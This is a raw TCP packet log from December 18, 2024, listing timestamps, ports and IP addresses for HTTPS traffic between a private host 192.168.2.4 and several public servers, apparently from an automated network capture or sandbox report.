                                                                                                        Dec 18, 2024 23:16:55.285319090 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.285367966 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.285547972 CET49758443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.285574913 CET44349758104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.288289070 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.288335085 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.288427114 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.288640976 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.288670063 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.305285931 CET49746443192.168.2.4104.21.78.181
                                                                                                        Dec 18, 2024 23:16:55.347363949 CET44349746104.21.78.181192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.441246033 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.441276073 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.441354036 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.441634893 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:55.441647053 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.635457039 CET44349746104.21.78.181192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.635652065 CET44349746104.21.78.181192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.635708094 CET49746443192.168.2.4104.21.78.181
                                                                                                        Dec 18, 2024 23:16:55.638977051 CET49746443192.168.2.4104.21.78.181
                                                                                                        Dec 18, 2024 23:16:55.638986111 CET44349746104.21.78.181192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.781065941 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:55.781135082 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.781218052 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:55.781414032 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:55.781444073 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.126972914 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.128660917 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.128726006 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.129868031 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.130808115 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.130939007 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.131001949 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.179172039 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.497836113 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.498152971 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.498215914 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.498575926 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.498836994 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.498902082 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.498936892 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.539369106 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.546288967 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.577759027 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.577850103 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.577915907 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.578485012 CET49764443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.578504086 CET44349764104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.654360056 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.654654980 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.654690981 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.655038118 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.655441999 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.655577898 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.655580044 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.655580044 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.655616999 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.708719969 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.956897974 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.956943035 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.956995010 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.957034111 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.957711935 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.957787991 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.957803965 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.959398985 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.959455013 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.959467888 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.964597940 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.964654922 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.964668989 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.972877026 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.972937107 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:56.972953081 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.005992889 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.006302118 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.006359100 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.007813931 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.007879019 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.009577990 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.009669065 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.010097980 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.010116100 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.012439013 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.012466908 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.050604105 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.064791918 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.126219034 CET4972380192.168.2.4199.232.210.172
                                                                                                        Dec 18, 2024 23:16:57.147928953 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.153522015 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.153570890 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.153585911 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.161628008 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.161695957 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.161710024 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.167753935 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.167787075 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.167879105 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.167891979 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.169248104 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.169269085 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.169325113 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.169336081 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.169423103 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.172646046 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.172697067 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.172708988 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.176042080 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.178107023 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.178170919 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.178198099 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.184823990 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.184844017 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.184879065 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.184886932 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.184936047 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.186240911 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.186292887 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.186305046 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.192722082 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.194406986 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.194472075 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.194490910 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.210484982 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.210571051 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.210583925 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.218617916 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.218702078 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.218713999 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.225981951 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.226035118 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.226046085 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.245328903 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.250823021 CET8049723199.232.210.172192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.250881910 CET4972380192.168.2.4199.232.210.172
                                                                                                        Dec 18, 2024 23:16:57.276217937 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.276230097 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.290771961 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.322637081 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.339766026 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.343116999 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.343125105 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.343328953 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.343383074 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.343399048 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.353239059 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.353298903 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.353311062 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.360955000 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.361046076 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.361057997 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.363677979 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.363725901 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.363734007 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.365123034 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.365175009 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.365186930 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.372138977 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.372226000 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.372234106 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.374399900 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.374411106 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.374458075 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.374471903 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.375999928 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.376045942 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.376054049 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.383003950 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.383091927 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.383104086 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.383187056 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.383222103 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.392231941 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.392288923 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.392309904 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.392368078 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.392601013 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.392625093 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.392652988 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.392663002 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.392708063 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.400490999 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.401087999 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.401097059 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.401155949 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.408843994 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.408932924 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.408941031 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.409759045 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.409766912 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.409822941 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.414455891 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.414464951 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.414592981 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.417149067 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.417208910 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.417217970 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.423401117 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.423485041 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.425786018 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.425838947 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.425847054 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.432528973 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.432595015 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.434504032 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.434554100 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.434561968 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.441178083 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.441226006 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.441232920 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.447539091 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.447637081 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.447643995 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.460894108 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.460973978 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.460988045 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.463860989 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.464077950 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.464085102 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.464108944 CET4434976835.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.464138985 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.464163065 CET49768443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.464503050 CET49771443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.464529037 CET4434977135.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.464591980 CET49771443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.464770079 CET49771443192.168.2.435.190.80.1
                                                                                                        Dec 18, 2024 23:16:57.464796066 CET4434977135.190.80.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.511862040 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.533739090 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.533839941 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.538142920 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.538203955 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.546242952 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.546339989 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.550287008 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.550380945 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.551702023 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.555695057 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.555744886 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.555753946 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.557794094 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.557874918 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.562165022 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.562246084 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.562253952 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.564704895 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.564766884 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.568228006 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.568281889 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.568294048 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.568321943 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.568362951 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.568386078 CET44349766104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.568411112 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.568411112 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.568454027 CET49766443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.575334072 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.575402021 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.575409889 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.575447083 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.584659100 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.584666967 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.584716082 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.584906101 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.584954023 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.593260050 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.593267918 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.593333006 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.598232031 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.598239899 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.598287106 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.606399059 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.606408119 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.606456041 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.614461899 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.614536047 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.622920036 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.622976065 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.627358913 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.627413034 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.635862112 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.635921955 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.640090942 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.640144110 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.648552895 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.648608923 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.656780005 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.656835079 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.663361073 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.663423061 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.745960951 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.746015072 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.752602100 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.752660990 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.756355047 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.756417990 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.762916088 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.762984037 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.766510963 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.766581059 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.772931099 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.772984028 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.779086113 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.779136896 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.782339096 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.782402992 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.788649082 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.788697004 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.791198015 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.791260958 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.791268110 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.791280985 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.791335106 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.791430950 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.791443110 CET44349767104.18.95.41192.168.2.4
                                                                                                        Dec 18, 2024 23:16:57.791451931 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.791486979 CET49767443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.938384056 CET49773443192.168.2.4104.18.95.41
                                                                                                        Dec 18, 2024 23:16:57.938407898 CET44349773104.18.95.41192.168.2.4
